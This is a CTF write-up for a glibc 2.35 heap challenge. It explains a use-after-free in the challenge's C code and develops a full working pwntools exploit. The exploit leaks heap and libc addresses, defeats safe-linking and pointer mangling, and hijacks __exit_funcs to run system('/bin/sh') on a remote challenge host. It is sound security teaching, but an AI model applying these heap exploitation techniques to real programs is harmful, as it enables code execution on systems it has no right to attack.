The challenge

We were given C source code along with a compiled version and a copy of ubuntu's glibc-2.35 (libc6_2.35-0ubuntu3_amd64)

This is your normal "CRUD" style (Create, Read, Update, Delete) heap challenge (this time without the "update" part):

#define MAX_CHUNK_SIZE 100
#define CHUNKS_LIST_SIZE 32

enum Action {
    ACTION_ADD = 1,
    ACTION_DELETE,
    ACTION_VIEW,
    ACTION_EXIT,
};

typedef struct chunk_t {
    int64_t size;
    int64_t used;
    void *ptr;
} chunk_t;

chunk_t *chunks[CHUNKS_LIST_SIZE];
size_t chunk_idx = 0;

void add_chunk(void) 
{
    if (chunk_idx >= CHUNKS_LIST_SIZE) {
        puts("[-] Chunk limit exceeded!");
        return;
    }

    printf("[?] Enter chunk size: ");
    size_t chunk_size = read_integer();

    if (chunk_size > MAX_CHUNK_SIZE) {
        puts("[-] Chunk is too large!");
        return;
    }

    chunk_t *new_chunk = (chunk_t *)malloc(sizeof(chunk_t));

    if (new_chunk == NULL) {
        puts("[-] Failed to create new chunk!");
        return;
    }

    void *ptr = (void *)malloc(chunk_size);

    if (ptr == NULL) {
        puts("[-] Failed to create chunk for data!");
        return;
    }

    printf("[?] Enter chunk data: ");
    ssize_t nbytes = read_into_buffer(ptr, chunk_size);

    new_chunk->size = chunk_size;
    new_chunk->used = true;
    new_chunk->ptr = ptr;

    chunks[chunk_idx] = new_chunk;
    chunk_idx += 1;
}

void delete_chunk(void) 
{
    printf("[?] Enter chunk id: ");
    size_t chunk_id = read_integer();

    if (chunk_id >= chunk_idx) {
        puts("[-] Invalid chunk index!");
        return;
    }

    chunk_t *chunk = chunks[chunk_id];

    if (chunk == NULL) {
        puts("[-] No such chunk!");
        return;
    }

    if (!chunk->used || chunk->ptr == NULL) {
        puts("[-] Chunk is not used!");
        return;
    }

    free(chunk->ptr); 
    chunk->ptr = NULL;
    chunk->used = false;
    free(chunks[chunk_id]);
}

void view_chunk(void)
{
    printf("[?] Enter chunk id: ");
    size_t chunk_id = read_integer();

    if (chunk_id >= CHUNKS_LIST_SIZE) {
        puts("[-] Invalid chunk index!");
        return;
    }

    if (chunks[chunk_id] == NULL) {
        puts("[-] No such chunk!");
        return;
    }

    if (!chunks[chunk_id]->used || chunks[chunk_id]->ptr == NULL) {
        puts("[-] Chunk is not used!");
        return;
    }

    write_from_buffer(chunks[chunk_id]->ptr, chunks[chunk_id]->size);
}

The vulnerability

Let's take a look at the delete_chunk function again:

void delete_chunk(void) 
{
    printf("[?] Enter chunk id: ");
    size_t chunk_id = read_integer();

    if (chunk_id >= chunk_idx) {
        puts("[-] Invalid chunk index!");
        return;
    }

    chunk_t *chunk = chunks[chunk_id];

    if (chunk == NULL) {
        puts("[-] No such chunk!");
        return;
    }

    if (!chunk->used || chunk->ptr == NULL) {
        puts("[-] Chunk is not used!");
        return;
    }

    free(chunk->ptr); 
    chunk->ptr = NULL;
    chunk->used = false;
    free(chunks[chunk_id]);
}

Looks quite good actually, the deleted chunk is marked as unused so that we cannot use it anymore and even the chunk's pointer is set to NULL so that we wouldn't have a dangling pointer to work with if the checks were faulty...

So what's the problem here? Let's look closely at the last line. The chunk_t with all the metadata about the entry is freed as well. However, it is still accessible through the old index so this is a use after free bug!

Only the inner pointer is protected from a use after free, but not the chunk_t itself. This is a friendly reminder, that you need to be very careful when programming in C. To fix this vulnerability, chunks[chunk_id] should have been set to NULL after the free.

A sidenote about Glibc >= 2.34

Before we exploit this vulnerability, let's look at the changes from recent glibc versions. It became a bit harder to exploit this stuff:

In version 2.34, __malloc_hook __free_hook and __realloc_hook were removed. These hooks were easy targets for heap exploitation, because writing the address of system to __free_hook and calling free on the string "/bin/sh" gave you a shell. All you needed for that was a write-what-where (and some address leaks to defeat ASLR). From a hacker's perspective this is very annoying, but it's a good decision to strengthen glibc's security. Now you have to find some other way to get code execution (we will use the __exit_funcs structure later on, this stores the functions to be executed before the program ends, set by atexit(3))

Furthermore, new glibc versions don't store function pointers directly anymore, but encrypted with a secret key created on startup (similar to stack canaries). We will later on see what this means for our exploit.

Exploitation

Talking with the binary

To make our life easier, let's wrap each action from the binary into a python function as the basic building blocks of our exploit:

chunk_idx = 0


def add(content, l=None):
    global chunk_idx
    assert chunk_idx < 32
    if not l:
        l = len(content)
    io.sendlineafter(b'> ', b'1')
    io.sendlineafter(b'chunk size: ', str(l).encode())
    io.sendafter(b'chunk data: ', content)
    chunk_idx += 1


def delete(idx):
    io.sendlineafter(b'> ', b'2')
    io.sendlineafter(b"chunk id: ", str(idx).encode())


def view(idx):
    io.sendlineafter(b'> ', b'3')
    io.sendlineafter(b'chunk id: ', str(idx).encode())
    response = io.recvuntil(b'1. Add')[:-6]
    assert response[:3] != 'b[-]', response
    return response

Basic exploit primitives

Read bytes from an arbitrary address

So what can we do with this vulnerability? Remember, a deleted chunk_t is freed, which means that this address can be returned for another allocation. If we manage to write arbitrary content at this location, we fill the chunk_t fields how we want.

Combine this with the view action, we can read from anywhere we want (just overwrite the length and ptr fields and set used to 1). So, how can we do this? If we delete a chunk, the corresponding allocations are put into the tcache (because of their size). If the content length was 24 (the same as sizeof(chunk_t)), then the tcache would look like this:

+----------+    +----------+
|          |    |          |
| chunk_t  | -> | contents |
|          |    |          |
+----------+    +----------+

If we allocate the next chunk, the first malloc request will be for a chunk_t, which will return the freed chunk_t address. While we can overwrite the old index this way, we don't have control over the pointer. In fact, the freed index will look exactly like our freshly allocated index so we don't get anything out of it at all. What we want to do instead is to have the chunk_t heap chunk returned for our string allocation... But to do so, we need another entry in the tcache in front.

What we can do is to free two different chunks. Then the tcache will look like this:

+----------+    +----------+    +----------+    +----------+
|          |    |          |    |          |    |          |
|chunk i+1 | -> | contents | -> | chunk i  | -> | contents |
|          |    |          |    |          |    |          |
+----------+    +----------+    +----------+    +----------+

If we would allocate a chunk of size 24 now, then the first two entries are removed to serve the allocations. However the chunk_t the same problem persists, as the chunk_t structure is written to chunk i+1, but we wanted our string to go into one of these chunks. Therefore, before we can allocate a chunk of size 24, we have to allocate a chunk of a bigger size, because then it cannot be served by these chunks as they are too small, thus removing only one element from this linked list.

After an add("a"*64), the tcache will look like this:

+----------+    +----------+    +----------+
|          |    |          |    |          |
| contents | -> | chunk i  | -> | contents |
|          |    |          |    |          |
+----------+    +----------+    +----------+

Therefore, the next add("b"*24) would fill chunk i with 24 0x62 (the ascii value of b). If we would view chunk i now, the binary will crash because we have overwritten the pointer with an invalid address.

Instead of 24 bs we want a reasonable payload, so let's use this one: p64(length) + p64(1) + p64(ptr). This is just the structure defined above, but this time we can control the length and the pointer value. If we view this chunk now, we read length bytes from ptr. This is our arbitrary read.

Note: While creating this writeup, I noticed that this can be done easier. If the second chunk we freed had a different size, it would be put into another tcache. So that we get:

+----------+    +----------+    +----------+
|          |    |          |    |          |
|chunk i+1 | -> | chunk i  | -> | contents |
|          |    |          |    |          |
+----------+    +----------+    +----------+

Now we can allocate a string of size 24 and it will be put into chunk i above...

Possibly arbitrary write? No, but we can free anything!

Unfortunately, we cannot get an arbitrary write the same way. While we could write any pointer and free the chunk (keep in mind that the pointer will be freed as well!), this will not work for arbitrary addresses, because free expects the freed pointer to have a valid heap chunk header in front of it (it needs to determine where to put this chunk after all!). However, most addresses will not look like a valid heap chunk and will result in a crash...

But we can use this to free an arbitrary (valid looking) heap chunk. So we get a double free out of it if we know some heap address.

Leaks

Ok, so now we can read from anywhere we want, but this executable is position independent, which means that all base addresses are random with ASLR turned on (not only the heap and libraries). Before we can read anything we need to know some addresses!

Heap leak

Fortunately, the read_to_buffer function contains another bug: It will only call the read() system call one time and not until the buffer is full. read will return any data that is available, without waiting until the complete buffer can be filled. This means that we can send only a single byte for our let's say 24 bytes buffer. So that 23 of 24 bytes will not be overwritten when allocating. However, because the buffer size is 24, view will still return 24 bytes, therefore we can read most of what was there before we allocated the chunk. As a freed heap chunk in the tcache has the fwd pointer as the first 8 bytes of the user data, we can recover 7 out of 8 bytes of the next chunks address in the tcache. As we will only need this up to the page boundary, we don't need the least significant byte anyway.

But wait, glibc has some pointer obfuscation in the tcache by now as well. It would be too easy without, right?

How does it work? The magic happens in the PROTECT_PTR macro in malloc.c:340:

/* Safe-Linking:
   Use randomness from ASLR (mmap_base) to protect single-linked lists
   of Fast-Bins and TCache.  That is, mask the "next" pointers of the
   lists' chunks, and also perform allocation alignment checks on them.
   This mechanism reduces the risk of pointer hijacking, as was done with
   Safe-Unlinking in the double-linked lists of Small-Bins.
   It assumes a minimum page size of 4096 bytes (12 bits).  Systems with
   larger pages provide less entropy, although the pointer mangling
   still works.  */
#define PROTECT_PTR(pos, ptr) \
  ((__typeof (ptr)) ((((size_t) pos) >> 12) ^ ((size_t) ptr)))
#define REVEAL_PTR(ptr)  PROTECT_PTR (&ptr, ptr)

How do we get the original pointer out of it? Well, if both arguments (the position where the pointer is written and the pointer itself) are on the same page, then we can fully reverse this obfuscation. We know that the first 12 bits are 0, because of the right shift by 12. This means that the first 12 bits are not modified. Now with these 12 bits we can decrypt the next 12 bits (because x^(x^y) = y). Now repeat this until you have decrypted the entire pointer:

def deobfuscate(val):
    mask = 0xfff << 52
    while mask:
        v = val & mask
        val ^= (v >> 12)
        mask >>= 12
    return val

Now, we just need to free two chunks and allocate one with a single \x00 byte, so that we can read the fwd pointer of the tcache. We need to free two chunks so that the fwd pointer is not NULL (therefore there are still elements in the tcache after it).

Then we can use the deobfuscate function to decrypt the pointer (the lowest byte is broken because it was overwritten with our null byte). Now, the base address of the heap is anything but the 12 lowest bits. (e.g. (leak >> 12) << 12)

Libc leak

How do we leak a libc address? The normal way would be to read this from a chunk in the unsorted bin... However, we can only allocate up to 100 bytes, which is too small to be put into the unsorted bin and will just go to the tcache instead.

However, we can just pretend that we've got a chunk large enough to be put into the unsorted bin... What if we write p64(0x421) somewhere on the heap? To glibc this looks like a heap chunk header of size 0x420 with the previous chunk in use bit set, if we free it, it will be put into the unsorted bin.

However, we still have to make it look like it's a valid chunk, before free accepts it. What does free check?

Is the chunk correctly aligned? All chunks returned by malloc are multiples of 0x10
Is the next chunk (at ptr + size - 8) valid? Is the prev_inuse_bit set? If it isn't try to merge these chunks
Is the previous chunk size (at ptr + size - 16) the same as the one in the header? If not, abort

Therefore, we need to add another valid looking chunk after the chunk we want to free. By experimenting inside GDB, we found out that for a chunk of size 0x420, we need 6 x 100 byte chunks to fill the gap in between. The end of the chunk is somewhere inside the seventh chunk, where we want to write p64(0x420)+p64(0x21) so that it looks like a valid chunk of size 0x20 with previous chunk size 0x420. This also sets the prev_inuse_bit so that free will not try to merge these chunks, leaving this bit unset would trigger more checks, which we do not want. This is how the heap will look like:

0x000056454cbe62f8: 0x0000000000000021 
0x000056454cbe6300: 0x6161616161616161 <- Pointer to the chunk we allocated
0x000056454cbe6308: 0x0000000000000421 <- Fake chunk header
0x000056454cbe6310: 0x0000000000000000
...
0x000056454cbe6720: 0x0000000000000420 <- Previous chunk size (checked by free)
0x000056454cbe6728: 0x0000000000000021 <- Next fake chunk (exactly 0x420 bytes after the first fake header)
0x000056454cbe6730: 0x0000000000000000
0x000056454cbe6738: 0x0000000000000000
0x000056454cbe6740: 0x0000000000000000
0x000056454cbe6748: 0x00000000000208c1 <- Header of the top chunk

Now, when we free the address where we wrote 0x420 + 8, our faked heap chunk will be put into the unsorted bin and we can read the pointer to glibc's main_arena+96 from the same address we just freed.

Luckily, we can use this pointer as is, there's no pointer obfuscation here (yet? :P)

Write anywhere

If we want code execution, we will need to replace a function pointer somewhere... So how do we do this?

Let's recall what we did to obtain a libc leak. We created a fake chunk and convinced free to accept it. What if we also freed the chunk where this fake chunk header is written? Then we could access the same chunk from two different places, which is bad, because then we can just overwrite the fwd pointer in the tcache to return us an arbitrary address...

However, there is a catch: The pointer returned by malloc must also be aligned to 0x10 bytes or else we fail a check in malloc and the program aborts. So we may have to write some bytes in front of our target as well.

Where do we want to write?

As said before, glibc 2.34 removed the easy __free_hook exploit primitive... Unfortunately, we have to deal with __exit_funcs now.

During the CTF, I used this blog post to figure out how it works. But it is also advisable to look at the source code here and here.

I will summarize the key points here again:

There is an unpublished symbol __exit_funcs that holds a linked list of functions to be executed before the program exits.
This address can be found by looking at the exit function, as it just calls _run_exit_handlers with the pointer that is stored in __exit_funcs.
Each function pointer is encrypted with xor and rotated right by 0x11 bits.
By default there is a function _dl_fini in there. We can figure out the address with GDB (set a breakpoint to the exit handler and step until the pointer is decrypted)
This function is in the linker, which is loaded directly after libc in the address space, so we can use the libc leak to compute the function's address
Once we have leaked the encrypted pointer, we can get the encryption key by rotateleft(leak) ^ _dl_fini_address
Now we can encrypt arbitrary addresses :)

How do we put this all together? We want to replace the pointer stored in __exit_funcs (whose address we know via the libc leak). We will put the address of a fake exit_function_list we allocated on the heap in there.

How does this structure look like?

enum
{
  ef_free,  /* `ef_free' MUST be zero!  */
  ef_us,
  ef_on,
  ef_at,
  ef_cxa
};

struct exit_function
  {
    /* `flavour' should be of type of the `enum' above but since we need
       this element in an atomic operation we have to use `long int'.  */
    long int flavor;
    union
      {
    void (*at) (void);
    struct
      {
        void (*fn) (int status, void *arg);
        void *arg;
      } on;
    struct
      {
        void (*fn) (void *arg, int status);
        void *arg;
        void *dso_handle;
      } cxa;
      } func;
  };
struct exit_function_list
  {
    struct exit_function_list *next;
    size_t idx;
    struct exit_function fns[32];
  };

Note: idx denotes the number of entries.

So we want a exit_function_list with next set to NULL, idx to 1 and an exit_function in fns[0]. What type of exit function do we want? There are different "flavors" to choose from. In our case type cxa looks nice, because we can specify a pointer as the first argument of the function as well.

If we put a pointer to "/bin/sh" into arg (just allocate it on the heap, we can calculate the offset) and the address of system into fn, a call to exit() will invoke system("/bin/sh") and we're done. What a ride!

Complete exploit

#!/usr/bin/env python3
from pwn import *

# Set up pwntools for the correct architecture
context.update(arch='amd64', terminal=['alacritty', '-e', 'sh', '-c'])


exe_file = './main'

host = '51.250.22.68'
port = 17001

binary = ELF(exe_file)
libc = ELF('./libc.so.6')


def start(argv=[]):
    '''Start the exploit against the target.'''
    if args.GDB:
        return gdb.debug([exe_file] + argv, gdbscript=gdbscript)
    elif args.REMOTE:
        return remote(host, port)
    else:
        return process([exe_file] + argv)


# Specify your GDB script here for debugging
# GDB will be launched if the exploit is run via e.g.
# ./exploit.py GDB
gdbscript = '''
'''

# ===========================================================
#                     EXPLOIT GOES HERE
# ===========================================================

io = start()
chunk_idx = 0


def add(content, l=None):
    global chunk_idx
    assert chunk_idx < 32
    if not l:
        l = len(content)
    io.sendlineafter(b'> ', b'1')
    io.sendlineafter(b'chunk size: ', str(l).encode())
    io.sendafter(b'chunk data: ', content)
    chunk_idx += 1


def delete(idx):
    io.sendlineafter(b'> ', b'2')
    io.sendlineafter(b"chunk id: ", str(idx).encode())


def view(idx):
    io.sendlineafter(b'> ', b'3')
    io.sendlineafter(b'chunk id: ', str(idx).encode())
    response = io.recvuntil(b'1. Add')[:-6]
    assert response[:3] != 'b[-]', response
    return response


# Read primitive
# When we free a chunk, chunks[idx] still points to the heap
# When that chunk is allocated again, we can fill the contents
# with anything we want
# Idea:
# 1. Free 2 chunks with content size 24 (= sizeof(chunk_t)) to put them in the tcache
#    Both their content and their datastructure is freed, so the tcache looks like this:
# +----------+    +----------+    +----------+    +----------+
# |          |    |          |    |          |    |          |
# |chunk i+1 | -> | contents | -> | chunk i  | -> | contents |
# |          |    |          |    |          |    |          |
# +----------+    +----------+    +----------+    +----------+
# When we would allocate, two chunks are removed and in the second one, we can write anything we want
# If we could discard the first one, we can write anything we want into chunk i (which is still accessible!)
# If we write a valid chunk layout (with used=1) into chunk i, we can read from the pointer in that structure (which we also control)
# 2. To discard a chunk, we allocate a string that is bigger than 24, so it cannot be served from the tcache
#    Therefore, only chunk i+1 is removed to serve the malloc(sizeof(chunk_t)).
# 3. Allocate a chunk of size 24 (= sizeof(chunk_t)). The chunk_t allocation will point to contents from above, while our allocated string
#    will be put into chunk i. The layout of chunk_t is length + used + ptr. Therefore we write p64(length to read) + p64(1) + p64(ptr to read)
# 4. If we view chunk i, it will read the length and ptr to read from the just allocated fake chunk_t
def read(ptr, l):
    idx = chunk_idx
    # 1. free 2 chunks of size 24
    add(b'A' * 24)
    add(b'B' * 24)
    delete(idx)
    delete(idx + 1)
    # 2. Discard a chunk (allocate with size > 24)
    add(b'C' * 64)
    # 3. Craft a fake chunk_t
    add(p64(l) + p64(1) + p64(ptr))
    # Use the dangling pointer from chunk idx, to read from wherever we like
    return view(idx)


# Can we also use something similar to write anywhere we like? Unfortunately not.
# We can only write to a chunk when we allocate it and not while it's in the tcache.
# Therefore we cannot overwrite a chunk's fwd pointer (it would work if we had a double free).
# However, we can use the previous idea to free an arbitrary pointer, giving us more control over the heap.
# To do so, instead of viewing the faked chunk, we simply delete it again, so that the pointer from
# the fake chunk_t is freed as well
def free(ptr):
    idx = chunk_idx
    # Same idea as before
    # 1. free 2 chunks of size 24
    add(b'A' * 24)
    add(b'B' * 24)
    delete(idx)
    delete(idx + 1)
    # 2. Discard a chunk
    add(b'C' * 64)
    # 3. Craft a fake chunk_t
    add(p64(8) + p64(1) + p64(ptr))
    # When we delete the fake chunk_t, the given ptr is also freed
    delete(idx)


# Defeat glibc's heap pointer obfuscation
# mangled = ptr ^ (address >> 12), where address is the address the pointer is stored at
# If the pointer is stored in the same page, we can fully recover the leaked pointer value,
# as we know the first 12 bits
def deobfuscate(val):
    mask = 0xfff << 52
    while mask:
        v = val & mask
        val ^= (v >> 12)
        mask >>= 12
    return val


# "/bin/sh" string we later use for system() call
add(b"/bin/sh")

# Leak a heap address
# When we free() a chunk it gets put into the tcache
add(b'K' * 24)
add(b'L' * 24)
delete(1)
delete(2)
add(b'\x00', l=24)
heap = (deobfuscate(u64(view(3)[:8])) >> 12) << 12
log.info(f'Heap @{hex(heap)}')

# Libc leak
# To leak a libc address, we need to put a chunk into the unsorted binary
# Unfortunately, we can only allocate up to 100 bytes, which is too short
# and will be put into the tcache instead
# Therefore, we create a fake chunk instead, which we will free manually.
# Glibc checks whether the chunk looks "sane", e.g. if the next chunk (ptr + chunk_size)
# has the prev_in_use bit set (lowest bit) and whether the previous size matches
# (at ptr + chunk_size - 8)
# We allocate our fake chunk of size 0x420 (1056 bytes, just enough to get into the unsorted bin)
add(b'7' * 8 + p64(0x420 + 1))
# Now, we need to get to the end of our fake chunk to make glibc happy
# 6 Chunks in between are enough (just tried in GDB, not used math for this one lol)
for i in range(6):
    add(bytes([i]) * 100)
# In this allocation is the end of our faked chunk.
# We need to write the previous chunk's size (0x420) followed by a valid chunk header (e.g. 0x21)
# It is important that the prev_in_use_bit is set (e.g. 0x20 would not work!)
# As I am too lazy to calculate the correct offset, we just do heap spraying :P
add((p64(0x420) + p64(0x21)) * 6)
# If we free this chunk, a pointer to glibc's main arena can be read from the chunk's fwd and bwd pointer
free(heap + 0x310)

# Careful! Heap allocations can be served from the chunk in the unsorted bin, shrinking it from the beginning of said chunk.
# Unfortunately, our read primitive allocates, so that after the allocations the fwd and bwd pointer are at offset 0x3a0
# instead of 0x310 (I also refused to use math for this one and did it in GDB)
libc.address = u64(read(heap + 0x3a0, 8)) - 0x219ce0
__exit_funcs = libc.address + 0x219838
log.info(f'libc         @{hex(libc.address)}')
log.info(f'__exit_funcs @{hex(__exit_funcs)}')

# We need to pop a shell after all. So what do we do next?
# Normally I'd just overwrite `__free_hook` with `system`, but glibc 2.34 removed the malloc hooks...
# Now, we have to use the __exit_funcs array which is way more complicated >:(
# I used this blogpost to figure it out: https://binholic.blogspot.com/2017/05/notes-on-abusing-exit-handlers.html
# To summarize it, we have to create exit_funcs_list on the heap and put the `system` function there with "/bin/sh\x00"
# as an argument (using the ex_cxa function type)
# It is advisable to read the source code to understand how and why:
# Here is the type definition: https://elixir.bootlin.com/glibc/glibc-2.35/source/stdlib/exit.h
# And here how the handlers are executed: https://elixir.bootlin.com/glibc/glibc-2.35/source/stdlib/exit.c

# But most importantly, glibc uses pointer mangling to "encrypt" stored function pointers
# The reasoning is that it makes it harder to write exploits (it really does)
# How does it work?
#   pointer encryption: rotateleft(ptr ^ key, 0x11)
#   pointer decryption: rotateright(ptr, 0x11) ^ key
# where key is a random value set at program start (similar to the stack canary)
# To find this key, we will need to obtain a known encrypted pointer. Luckily there is one in the __exit_funcs by default.
# See the above blogpost for details

# This is where the original __exit_funcs first function is stored (found the offset using gdb):
orig_onexit_addr = libc.address + 0x21af18
# And this is the address of the function (_dl_fini) it calls
orig_handler = libc.address + 0x230040


# The shifts are copied from the above blogpost
# Rotate left: 0b1001 --> 0b0011
rol = lambda val, r_bits, max_bits: \
    (val << r_bits%max_bits) & (2**max_bits-1) | \
    ((val & (2**max_bits-1)) >> (max_bits-(r_bits%max_bits)))

# Rotate right: 0b1001 --> 0b1100
ror = lambda val, r_bits, max_bits: \
    ((val & (2**max_bits-1)) >> r_bits%max_bits) | \
    (val << (max_bits-(r_bits%max_bits)) & (2**max_bits-1))


# encrypt a function pointer
def encrypt(v, key):
    return p64(rol(v ^ key, 0x11, 64))

# obtain the key
key = ror(u64(read(orig_onexit_addr, 8)), 0x11, 64) ^ orig_handler

# Sanity check that the implementation is correct (check in GDB)
log.info(f'ptr encryption key: {hex(key)}')
log.info(f'sanity check: {hex(u64(encrypt(orig_handler, key)))}')

# Next, we need to allocate our exit_function_list, we're using the cxa type because it is called as func(void *arg, int status)
# This is nice to obtain system(void *arg) where arg is a pointer to "/bin/sh"
# We already allocated the '/bin/sh' at offset 0x2c0
#############  next | count  | type (cxa) | addr                             | arg               | not used
onexit_fun = p64(0) + p64(1) + p64(4)     + encrypt(libc.sym['system'], key) + p64(heap + 0x2c0) + p64(0)
add(onexit_fun)

# So, how do we write this to the __exit_funcs pointer?
# We can use the free()-primitive to get a double free
# Then we can allocate one (setting the fwd pointer)
# Note that glibc checks whether tcache chunks are properly aligned (multiple of 0x10)
# As it is at an odd address, we have to allocate 8 bytes earlier and pad our string
idx = chunk_idx
add(b'0' * 24 + p64(0x21) + b'Z'*16)
delete(idx)
free(heap + 0x4d0)

# Now, when we allocate the chunk_t again (chunk idx), we can overwrite the fwd pointer,
# which will be served in the next allocation
# Important: We have to obfuscate the pointer!
add(b'0' * 24 + p64(0x21) + p64((__exit_funcs - 8) ^ (heap >> 12)) + b'Y'*16)
# Now, the next alloc returns the address __exit_funcs - 8, which we will overwrite
# with our exit_function_list we allocated earlier
add(b'\x00' * 8 + p64(heap + 0x450))

# Now we can exit and let everything unfold
io.sendlineafter(b'> ', b'4')
io.interactive()

heap-2022

The challenge

The vulnerability

A sidenote about Glibc >= 2.34

Exploitation

Talking with the binary

Basic exploit primitives

Read bytes from an arbitrary address

Possibly arbitrary write? No, but we can free anything!

Leaks

Heap leak

Libc leak

Write anywhere

Where do we want to write?

Complete exploit

Comments

heap-2022

The challenge

The vulnerability

A sidenote about Glibc >= 2.34

Exploitation

Talking with the binary

Basic exploit primitives

Read bytes from an arbitrary address

Possibly arbitrary write? No, but we can free anything!

Leaks

Heap leak

Libc leak

Write anywhere

Where do we want to write?

Complete exploit

Comments

Sign in with